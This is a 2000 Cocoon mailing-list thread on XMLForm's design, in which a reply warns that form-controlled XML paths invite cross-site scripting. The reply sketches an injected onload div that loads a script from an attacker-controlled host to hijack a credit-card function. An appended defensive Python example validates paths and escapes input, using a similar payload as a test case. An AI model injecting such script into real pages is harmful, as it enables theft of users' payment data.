cocoon-dev mailing list archives

From "Mark Washeim" <>
Subject Re: [announce] XMLForm - a new project using Xerces, Xalan, & JTidy
Date Sat, 04 Mar 2000 00:43:47 GMT
>> How else do you suppose content editors
>> are going to be able to edit site content over the web??
>Anybody heard of WebDAV?

We're about 2 weeks away from a prototype swing applet that works using
schemas to create interfaces to create and edit document instances. I'll
have designs posted Monday or Tuesday and source, ASAP.

>> If you're worried
>> about users being able to fake forms, well, there's a reason it's a POST
>> only servlet. I'm already going to add origination URL restrictions.
>> > I think Donald's proposal is clever, but adds more problems than it
>> > solves. We must think about better ways to do the full loop
>> Can you elaborate? Right now, the only thing I don't like about XMLForm
>> having to write the XML fragment mockup in the HTML form using specially
>> named parameters. However, Eric van der Vlist has suggested an
>> alternate strategy that I may well adopt. That being said, I'm now
>> adding, editing, and removing fragments from my XML files through a nice
>> HTML form interface using XMLForm and cocoon. I'd rather like to know
>> problems you see with this approach.
>Like I said, it's clever to encode the logical structure of the data in
>their variable names.... still this is a very dangerous approach. You're
>asking for trouble.

>Not only are you allowing people to change your web content by forms
>(have you read the latest security recommendation about cross-scripting?
>well, download Apache 1.3.12 to find out.) but you give them the power
>to place this content where they want in your tree.
>So, let's say, if Amazon allowed this in their page...something like
> text -> /document/comments/comment/text
>and instead I hack up the HTML page and do
> text -> /document/header/title
>I put "<div onload="invoque('http://myhost/myscript.js')"></div>"
>and overwrite the "sendCreditCardNumber()" method from their page
>cloning it to my own site.
>Without even having to hack their site.
>Do you deal with something like that?
>> It's not a proposal, anyway, it's a project. Proposal is when you say you
>> want to do something, project is when you have done something. :)
>Sorry, you're right.
>I think we need something like this
> <form>
>  <parameter name="whatever" defaultvalue="..." type="..."/>
>  ...
> </form>
> <xsp:handle
>that should generate the producer able to handle both GET (and create
>the form) and POST (and process the form doing security tests).
>This is what I mean by loop.
> request -(get)-> form to fill -(post)-> response
>all compiled into one XSP that takes care of everything (hopefully
>backed up with some OODBMS of some sort... either XML based or EJB

I'm not sure if anyone was paying attention, but we'll also present a full
cycle: EJB session (container-managed persistence) to XML (via KBML) to HTML
(XSL-generated form) and back again.
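The concern quoted above is that a parameter name chooses where in the document tree a posted value lands, so a tampered form can write markup into a location the form never meant to expose. The following is an added illustration, not code from this thread or from XMLForm: it assumes a "field -> /absolute/path" naming convention (after the "text -> /document/comments/comment/text" shape quoted above), checks each target path against an allowlist of writable locations, and escapes the value so it is stored as text rather than as new elements. It is written in Python for illustration rather than in the servlet's Java.

```python
import html
import re

# Constructed allowlist: the only document locations that form input may write.
# Anything else (e.g. /document/header/title) is refused outright.
WRITABLE_PATHS = {
    "/document/comments/comment/text",
    "/document/comments/comment/author",
}

# Assumed parameter-name convention "field -> /absolute/path", after the
# "text -> /document/comments/comment/text" shape quoted in the thread.
_PARAM_RE = re.compile(r"^\s*([A-Za-z_][\w-]*)\s*->\s*(/[\w/.-]+)\s*$")

def parse_param_name(name):
    """Split 'field -> /path' into (field, path); None if malformed."""
    m = _PARAM_RE.match(name)
    return (m.group(1), m.group(2)) if m else None

def check_fragment_updates(form):
    """Validate a POSTed form {param_name: value} against the allowlist.

    Returns (accepted, rejected): accepted maps path -> escaped text node
    content; rejected lists (param_name, reason) for refused fields.
    """
    accepted, rejected = {}, []
    for name, value in form.items():
        parsed = parse_param_name(name)
        if parsed is None:
            rejected.append((name, "malformed parameter name"))
            continue
        _field, path = parsed
        if path not in WRITABLE_PATHS:
            rejected.append((name, "path not writable: " + path))
            continue
        # Escape so markup in the value stays text and never becomes
        # elements (or live HTML) in the stored document.
        accepted[path] = html.escape(value, quote=True)
    return accepted, rejected

# Constructed sample POST: one legitimate comment field plus an attempt to
# write markup into the page header, as described in the thread.
SAMPLE_FORM = {
    "text -> /document/comments/comment/text": "Great book <b>really</b>",
    "title -> /document/header/title": '<div onload="x()"></div>',
    "junk": "no mapping at all",
}
```

Running `check_fragment_updates(SAMPLE_FORM)` accepts only the comment text (with its tags escaped) and rejects both the header write and the unmapped field.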
